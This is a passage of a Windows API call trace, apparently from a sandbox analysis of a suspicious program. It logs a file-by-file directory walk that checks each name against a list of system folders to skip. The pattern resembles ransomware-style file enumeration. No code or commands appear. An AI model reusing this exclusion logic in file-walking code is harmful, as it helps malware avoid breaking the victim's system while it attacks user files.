lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dba8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0126.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0126.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.522] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf03d07a0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf03d07a0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28c8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.522] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0126.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0126.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.523] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1b0f72e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b0f72e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b359a5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.523] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0126.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0126.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0126.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0126.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247f60 [0126.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.524] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22a9f7a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22a9f7a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22a9f7a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.524] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0126.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0126.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e458 [0126.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0126.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.524] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf466c4e5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf466c4e5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf466c4e5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.524] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0126.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0126.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.525] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4d48116, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4d48116, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13060, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.525] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d770, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d920, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e7a0 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.526] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9992797, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9992797, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9992797, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19ae8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.526] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d698, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dde8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244708 [0126.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 